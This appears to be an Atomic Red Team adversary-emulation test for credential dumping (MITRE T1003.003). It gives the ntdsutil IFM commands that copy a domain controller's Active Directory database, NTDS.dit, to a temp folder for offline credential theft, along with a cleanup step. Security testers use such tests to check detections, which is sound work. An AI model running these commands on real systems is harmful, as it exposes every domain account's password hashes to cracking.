#TechniqueName: OS Credential Dumping: NTDS
#AtomicTestName: Dump Active Directory Database with NTDSUtil
#Description: This test is intended to be run on a domain Controller.&&The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability&uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of&subsequent domain controllers without the need of network-based replication.&&Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.&
#Language: cmd

#get_prereq_commands
echo Sorry, Promoting this machine to a Domain Controller must be done manually


#commands
mkdir C:\Windows\Temp\ntds_T1003
ntdsutil "ac i ntds" "ifm" "create full C:\Windows\Temp\ntds_T1003" q q


#cleanup_commands
rmdir /q /s C:\Windows\Temp\ntds_T1003 >nul 2>&1

